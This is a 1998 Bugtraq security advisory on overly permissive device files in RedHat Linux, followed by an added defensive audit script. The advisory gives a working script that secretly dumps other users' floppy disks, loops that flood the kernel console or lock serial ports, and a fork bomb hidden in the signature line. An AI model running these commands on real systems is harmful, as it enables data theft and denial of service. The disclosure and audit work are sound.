Date: Wed, 4 Feb 1998 09:45:37 +0100
From: Michał Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: RedHat 4.x/5.0 /dev permissions

First one
----------

Any user can read data from a floppy (even one that is not mounted) using
"cat /dev/fd0H1440". It isn't dangerous in itself, but...

Any user may write a script which periodically checks whether the floppy has
just been unmounted, then dumps its contents to a file. Here's a sample
'floppy collector':

-- fdumper --
    #!/bin/sh

    DUMP_DEV=/dev/fd0H1440
    MOUNT_DEV=/dev/fd0
    LABEL=0
    DUMPED=1

    while :; do
      sleep 1
      if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
        if [ "$DUMPED" = "0" ]; then
          echo "Dumping image #$LABEL..."
          cat $DUMP_DEV >.fdimage$LABEL
          let LABEL=LABEL+1
          DUMPED=1
        fi
      else
        DUMPED=0
      fi
    done
-- eof --

Also, if there's no floppy in the drive, an unprivileged user may flood the
kernel log console (the local console by default!!!):

    [user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged to
/var/log/messages AND to the console (default klogd behaviour). Also, every
printk(...) (called by the fd driver) uses sync() to flush buffers. It will
cause abnormal hdd activity.

Second one
-----------

(not tested with rh 5.0)

Ordinary users are allowed to read /dev/ttyS*. The serial port driver
disallows multiple access attempts at the same time, so a user may
permanently lock a chosen port using this command:

    [user@host user]$ cat /dev/ttyS0
    (Ctrl+Z)
    [user@host user]$ cat /dev/ttyS0
    cat: /dev/ttyS0: device is busy

Now the serial port is in an unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, e.g. /dev/sequencer,
which are world-readable or even world-writable. There's NO reason to give
ordinary users direct access to hardware devices. It's quite easy (as shown
above ;) to obtain interesting data or cause a system failure by
reading/writing these devices.

Solution...
------------

    ls -l /dev/* | grep "r-- "
    chmod ;)

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
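
The check suggested under "Solution", expanded into an audit script. This is an added example, not part of the original post: the function names, the allowlist of pseudo-devices and the sample listing are assumptions constructed for illustration, and list_dev_nodes relies on GNU find's -printf.

```shell
#!/bin/sh
# Added example (not from the original post): flag device nodes that
# "other" users can read or write. Input lines: "<ls-style mode> <path>".

# Pseudo-devices that must stay world-accessible (assumed allowlist).
ALLOW="/dev/null /dev/zero /dev/full /dev/random /dev/urandom /dev/tty /dev/ptmx"

# Emit "<mode> <path>" for each block/char device under DIR (GNU find).
list_dev_nodes() {
    find "${1:-/dev}" \( -type b -o -type c \) -printf '%M %p\n' 2>/dev/null
}

# Read "<mode> <path>" lines on stdin; print "<access> <path>" for every
# non-allowlisted block/char device whose "other" bits grant r and/or w.
flag_world_access() {
    while read -r mode path; do
        case "$mode" in [bc]*) ;; *) continue ;; esac       # devices only
        case " $ALLOW " in *" $path "*) continue ;; esac    # expected ones
        other=$(printf '%s' "$mode" | cut -c8-10)           # e.g. "rw-"
        access=""
        case "$other" in r*)  access="read" ;; esac
        case "$other" in ?w*) access="${access:+$access+}write" ;; esac
        if [ -n "$access" ]; then
            printf '%s %s\n' "$access" "$path"
        fi
    done
    return 0
}

# Constructed sample listing (modes are illustrative, not taken from a host).
SAMPLE='brw-rw-r-- /dev/fd0H1440
crw-rw-r-- /dev/ttyS0
crw-rw-rw- /dev/sequencer
crw-rw-rw- /dev/null
brw-rw---- /dev/hda
-rw-r--r-- /dev/MAKEDEV'

# Run the audit over the sample listing.
printf '%s\n' "$SAMPLE" | flag_world_access
```

On a live system, feed it real data with `list_dev_nodes /dev | flag_world_access` and review each hit before changing its mode.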